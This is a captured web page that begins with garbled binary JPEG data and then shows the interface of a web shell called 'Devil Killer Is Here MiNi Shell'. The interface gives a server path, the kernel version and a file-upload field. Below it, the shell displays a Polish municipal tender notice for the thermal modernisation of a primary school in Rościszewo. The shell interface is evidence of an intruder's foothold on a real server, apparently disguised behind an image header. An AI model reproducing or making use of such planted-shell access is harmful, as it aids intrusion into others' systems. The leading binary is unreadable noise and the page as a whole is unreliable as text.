JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/0023355001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja budynku Szkoły Podstawowej im. Fryderyka Chopina w Rościszewie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rościszewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015900</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej, 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rościszewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(24)2764076</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(24)2764201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rosciszewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rosciszewo.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja budynku Szkoły Podstawowej im. Fryderyka Chopina w Rościszewie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9de60007-8dc7-49c1-a3f9-3be973f5eadf</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00233550</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00184441/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Termomodernizacja budynku Szkoły Podstawowej im. Fryderyka Chopina w Rościszewie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> 1. Zamawiający informuje że, inwestycja otrzymała dofinansowanie ze środków Krajowego Planu Odbudowy i Zwiększania Odporności (KPO), w ramach Inwestycji B1.1.3 – Termomodernizacja instytucji edukacyjnych, przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej (NFOŚiGW), działający jako jednostka wspierająca. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń z uwzględnieniem wyjątków określonych w Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Komunikacja miedzy zamawiającym a wykonawcami, z uwzględnieniem wyjątków określonych w ustawie odbywa się za pośrednictwem platformy „JOSEPHINE”. pod adresem https://josephina.proebiz.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest pod numerem referencyjnym sprawy: RRGKB.271.3.2025 Wykonawcy powinni we wszelkich kontaktach z zamawiającym powoływać się na wskazany numer referencyjny.<br/>2. Komunikacja miedzy zamawiającym a wykonawcami prowadzona jest w języku polskim.<br/>3. Zgodnie z art. 20 ust. 1 ustawy Pzp postępowanie o udzielenie zamówienia, z zastrzeżeniem wyjątków przewidzianych w Pzp, prowadzi się pisemnie.<br/>4. Nie udziela się żadnych ustnych i telefonicznych informacji, wyjaśnień czy odpowiedzi na kierowane do Zamawiającego pytania.<br/>5. Wykonawca pobierający wersję elektroniczną SWZ z Platformy, zobowiązany jest do jej monitorowania w tym samym miejscu, z którego została pobrana, gdyż zamieszczane tam są wszelkie informacje dotyczące postępowania.<br/>6. W przypadku rozbieżności pomiędzy treścią SWZ, a treścią udzielonych odpowiedzi jako obowiązującą należy przyjąć treść pisma zawierającego późniejsze oświadczenie Zamawiającego.<br/>7. Wykonawca składając swoją ofertę, oświadcza, że zapoznał się z instrukcją użytkowania platformy.<br/>8. warunki korzystania z platformy JOSEPHINE oraz sposób dokonania rejestracji przez wykonawcę zawiera rozdział XVIII SWZ<br/>9. Wymagania techniczne<br/>9.1. Twój komputer musi być podłączony do internetu. Dla sprawnego udziału w systemie Josephine przeznaczonego do elektronicznego składania ofert i elektronicznej komunikacji w zamówieniach publicznych należy zainstalować jedną z przeglądarek <br/>internetowych Mozilla Firefox 13.0 i wyższą (https://firefox.com), Google Chrome https://google.com/chrome), Microsoft Edge (https://www.microsoft.com/edge) lub Internet Explorer wersję 11.0 i wyższą https://microsoft.com/).<br/>9.2. Konieczne jest włączenie obsługi javascript i plików cookie w przeglądarce. Instrukcję w jaki sposób włączyć obsługę plików cookie w przeglądarce internetowej można znaleźć pod adresem https://proebiz.com/pl/support. Możesz również wykonać test przeglądarki, który znajduje się w sekcji SUPPORT w stopce JOSEPHINE.<br/>9.3. W zamówieniach publicznych, w których wymagany jest podpis elektroniczny, Wykonawca musi posiadać ważny podpis elektroniczny oparty na kwalifikowanym certyfikacie spełniającym wymagania rozporządzenia (UE) nr 910/2014 Parlamentu Europejskiego i Rady Europy oraz odpowiednich przepisów państwowych. Podpisy elektroniczne oparte na kwalifikowanym certyfikacie są wystawiane przez kwalifikowanych dostawców usług w poszczególnych państwach członkowskich UE.<br/>9.4. Wykonawca ma w środowisku oprogramowania JOSEPHINE możliwość dodać do swoich wiadomości dokumenty elektroniczne (pliki). W przypadku komunikacji niezaszyfrowanej całkowita maksymalna objętość danych wynosi 500 MB, dla komunikacji szyfrowanej 300 MB. Maksymalna wielkość oznacza całkowitą objętość danych wykonawcy w ramach prowadzonej operacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Rościszewo, ul. Armii Krajowej 1, 09-204 Rościszewo, tel.: (24)2764011, e-mail: ugrosciszewo@interia.pl;<br/>2. Inspektorem ochrony danych osobowych w Gminie Rościszewo jest Pani Elżbieta Zielińska tel.: (24)276401 wew. 33, e-mail: iodo.rosciszewo@wp.pl.<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn. zm.), zwanej dalej Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami Pzp.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 Pzp.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>8.1. dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania;<br/>8.2. w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do organu</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Osobie, której dane dotyczą nie przysługuje:<br/>1.1. w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych; <br/>1.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>1.3. na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRGKB.271.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający żąda określonej etykiety lub wskazuje mające zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustaw - etykiety środowiskowej (tzw. Ekoetykieta)</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia: Przedmiotem zamówienia jest kompleksowa termomodernizacja budynku Szkoły Podstawowej im. Fryderyka Chopina w Rościszewie przy ul. Reymonta 4. Celem inwestycji jest poprawa efektywności energetycznej poprzez zmniejszenie zużycia energii pierwotnej o 60,5% oraz energii końcowej o 49,7%, zgodnie z audytem energetycznym.<br/>2.	Zakres robót budowlanych obejmuje:<br/>2.1.	Docieplenie ścian zewnętrznych: Zakres obejmuje kompleksowe docieplenie ścian zewnętrznych budynku metodą lekką-mokrą:<br/>2.1.1.	Przygotowanie podłoża – oczyszczenie i wyrównanie powierzchni ścian (1515,00 m²),<br/>2.1.2.	Sprawdzenie przyczepności zaprawy klejowej do podłoża (1515,00 m²),<br/>2.1.3.	Montaż płyt styropianowych EPS 100 fasadowych o grubości 15 cm, λ ≤ 0,033 W/(m·K), współczynnik przenikania ciepła ściany po ociepleniu: U = 0,186 W/(m²·K),<br/>2.1.4.	Warstwa zbrojona siatką z włókna szklanego,<br/>2.1.5.	Wykonanie wyprawy tynkarskiej – tynk cienkowarstwowy akrylowy barwiony w masie,<br/>2.1.6.	Obróbki blacharskie – montaż parapetów z blachy powlekanej (65,00 m²),<br/>2.1.7.	Przyklejenie płyt styropianowych EPS 100 do ścian fundamentowych (170,00 m²),<br/>2.1.8.	Folia kubełkowa do ochrony izolacji (86,50 m²),<br/>2.1.9.	Gruntowanie podłoża (85,00 m²),<br/>2.1.10.	Wykonanie cokołu z tynku mozaikowego (85,00 m²).<br/>2.2.	Modernizacja dachu: Roboty dotyczące modernizacji dachu obejmują:<br/>2.2.1.	Demontaż istniejącego pokrycia dachowego z blachy (1590,00 m²),<br/>2.2.2.	Demontaż konstrukcji ołacenia i części więźby dachowej (1635,18 m²),<br/>2.2.3.	Wymiana zdegradowanych elementów więźby – drewno nasycone, przekrój powyżej 180 cm², krokwie o długości powyżej 4,5 m (15,00 m³),<br/>2.2.4.	Wykonanie nowej izolacji cieplnej z mat z wełny mineralnej o grubości 25 cm, λ ≤ 0,038 W/(m·K), współczynnik przenikania ciepła U = 0,110 W/(m²·K) (1490,00 m²),<br/>2.2.5.	Montaż membrany dachowej (1590,00 m²),<br/>2.2.6.	Pokrycie z blachy dachówkowej powlekanej (1590,00 m²),<br/>2.2.7.	Obróbki blacharskie – gzymsy, okapy, murki ogniowe (266,00 m²),<br/>2.2.8.	Montaż systemu orynnowania: rynny półokrągłe o śr. 150 mm (218,00 m), rury spustowe śr. 150 mm (153,00 m),<br/>2.2.9.	Demontaż i ponowny montaż instalacji fotowoltaicznej o mocy 26,3 kW (1 kpl.),<br/>2.2.10.	Montaż zabezpieczeń przeciw ptakom – kolce i siatki (105,00 m),<br/>2.2.11.	Wykonanie kompletnej instalacji odgromowej (1 kpl.).<br/>2.3.	Roboty z zakresu instalacji sanitarnych i grzewczych:<br/>2.3.1.	Demontaż istniejących instalacji stalowych:<br/>•	łącznie demontowanych ponad 1000 mb rur stalowych różnych średnic (od 10 mm do 80 mm),<br/>•	demontaż 110 grzejników żeliwnych,<br/>•	usunięcie ponad 200 zaworów i osprzętu.<br/>2.3.2.	Montaż nowej instalacji c.o.:<br/>•	850 mb rurociągów z rur stalowych (STEEL) o różnych średnicach,<br/>•	montaż 112 grzejników stalowych:<br/>	23 jednopłytowe,<br/>	14 dwupłytowych,<br/>	75 trzypłytowych – wszystkie z osłonami,<br/>•	montaż 112 głowic termostatycznych i zaworów grzejnikowych,<br/>•	montaż odpowietrzników automatycznych, zaworów kulowych, rozdzielaczy,<br/>•	próby szczelności, płukanie instalacji, regulacja na gorąco.<br/>2.4.	Przyłącze ciepłownicze (zewnętrzne)<br/>2.4.1.	Wykopy liniowe i ręczne: ok. 250 m³ gruntu,<br/>2.4.2.	Montaż 2x55 m rurociągów preizolowanych PEHD (c.o. i c.w.u.),<br/>2.4.3.	Próby szczelności rurociągów, wymiana gruntu, zagęszczenia, zasypanie,<br/>2.4.4.	Budowa kanałów rurowych z pospółki (grubość warstw: 10 i 25 cm),<br/>2.4.5.	Wywóz gruntu, roboty transportowe (ponad 500 m³ transportu).<br/>2.5.	Kotłownia i źródło ciepła – modernizacja systemu<br/>2.5.1.	Dostawa, montaż i uruchomienie kompletnej instalacji solarnej:<br/>2.5.2.	panele słoneczne, zasobnik c.w.u. 750 l, grupa pompowa, naczynia, zawory,<br/>2.5.3.	Montaż naczynia przeponowego,<br/>2.5.4.	Montaż pomp cyrkulacyjnych,<br/>2.5.5.	Montaż filtrów, zaworów bezpieczeństwa, siatkowych, kulowych,<br/>2.5.6.	Montaż automatyki, rozdzielnic, szaf sterowniczych,<br/>2.5.7.	Przeprowadzenie prób ciśnieniowych i uruchomienie systemu.<br/>2.6.	Wymiana stolarki drzwiowej:<br/>2.6.1.	Drzwi aluminiowe dwuskrzydłowe o współczynniku U = 1,3 W/(m²·K), bardzo szczelne (a &lt; 0,3) – 15,75 m².<br/>2.7.	Modernizacja oświetlenia:<br/>2.7.1.	Demontaż opraw świetlówkowych (376 szt.),<br/>2.7.2.	Montaż opraw LED (376 szt.),<br/>2.7.3.	Gładzie gipsowe i malowanie sufitów – łącznie 2876,00 m².<br/>2.8.	Podjazd dla osób niepełnosprawnych:<br/>2.8.1.	Demontaż istniejącej nawierzchni (16,00 m²),<br/>2.8.2.	Ściany żelbetowe grubości 8 cm (15,00 m²),<br/>2.8.3.	Podsypki cementowo-piaskowe 3 cm + 7 cm (13,00 m²),<br/>2.8.4.	Nawierzchnia z kostki brukowej betonowej 6 cm (13,00 m²),<br/>2.8.5.	Balustrady ze stali nierdzewnej KO (15,00 m).<br/>3.	Szczegółowe dane ilościowe robót znajdują się w kosztorysach inwestorskich branży budowlanej oraz sanitarnej, które stanowią integralną część dokumentacji.<br/>4.	Zamawiający wymaga, aby wszystkie rozwiązania projektowe, materiały i technologie zastosowane w ramach realizacji niniejszego zamówienia odpowiadały wymaganiom zawartym w audycie energetycznym i audycie ex-ante, stanowiącym integralną część dokumentacji przetargowej.<br/>Celem przedsięwzięcia jest osiągnięcie następujących minimalnych parametrów efektywności energetycznej budynku po modernizacji:<br/>4.1.	EP (energia pierwotna)	≤ 67,83	kWh/m²/rok<br/>4.2.	EK (energia końcowa)	≤ 61,67	kWh/m²/rok<br/>4.3.	Oszczędność energii końcowej	≥ 49,7% <br/>4.4.	Oszczędność energii pierwotnej	≥ 60,5% <br/>4.5.	Redukcja emisji CO₂ ≥ 92,6 Mg/rok<br/>5.	Minimalne wymagania techniczne wynikające z audytu<br/>5.1.	Docieplenie ścian zewnętrznych:<br/>5.1.1.	Materiał: styropian EPS Fasada λ ≤ 0,033 W/(m·K),<br/>5.1.2.	Grubość: 15 cm,<br/>5.1.3.	Współczynnik przenikania ciepła po modernizacji: U ≤ 0,186 W/(m²K).<br/>5.2.	Docieplenie dachu:<br/>5.2.1.	Materiał: mata z wełny szklanej λ ≤ 0,038 W/(m·K),<br/>5.2.2.	Grubość: 25 cm,<br/>5.2.3.	Współczynnik przenikania ciepła po modernizacji: U ≤ 0,110 W/(m²K).<br/>5.3.	Stolarka okienna:<br/>5.3.1.	Nowe okna o współczynniku przenikania ciepła U ≤ 1,10 W/(m²K),<br/>5.3.2.	Wymagane wysokie parametry szczelności (a &lt; 0,3 m³/h·m).<br/>5.4.	Drzwi zewnętrzne:<br/>5.4.1.	Współczynnik przenikania ciepła U ≤ 1,30 W/(m²K).<br/>5.5.	Instalacje:<br/>5.5.1.	Izolacja rurociągów c.o. i c.w.u. zgodnie z WT2021,<br/>5.5.2.	Montaż głowic termostatycznych,<br/>5.5.3.	Modernizacja instalacji oświetlenia – oprawy LED klasy energetycznej A lub lepszej.<br/>5.6.	Źródło ciepła i OZE:<br/>5.6.1.	Montaż kolektorów słonecznych – min. 45 m² powierzchni czynnej,<br/>5.6.2.	Instalacja zasobnika buforowego i automatyką sterującą.<br/>6.	Wymagania ogólne: Wszystkie prace muszą być wykonane zgodnie z dokumentacją projektową, obowiązującymi normami budowlanymi, przepisami prawa, wytycznymi efektywności energetycznej, sztuką budowlaną oraz wytycznymi KPO. Materiały zastosowane muszą posiadać odpowiednie certyfikaty i spełniać wymagania techniczne określone w dokumentacji projektowej.<br/>7.	Cel zamówienia: Realizacja inwestycji ma doprowadzić do znacznego ograniczenia zużycia energii cieplnej i elektrycznej, redukcji emisji CO₂, poprawy komfortu użytkowników oraz obniżenia kosztów eksploatacyjnych budynku. Projekt wpisuje się w politykę klimatyczną i efektywności energetycznej Unii Europejskiej oraz KPO – komponent B.<br/><br/>8.	Szczegółowy opis Przedmiotu zamówienia określony został w :<br/>8.1.	przedmiarach robót – załącznik nr 9 do SWZ<br/>8.2.	dokumentacji projektowej – załącznik nr 10 do SWZ<br/>8.3.	audyt energetyczny modernizacyjny oraz Ex-Ante – załącznik nr 11 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45261410-1 - Izolowanie dachu</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">09331100-9 - Kolektory słoneczne do produkcji ciepła</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">09310000-5 - Elektryczność</p> <p class="mb-0">31527260-6 - Systemy oświetleniowe</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45233260-9 - Roboty budowlane w zakresie dróg pieszych</p> <p class="mb-0">45262520-2 - Roboty murowe</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny 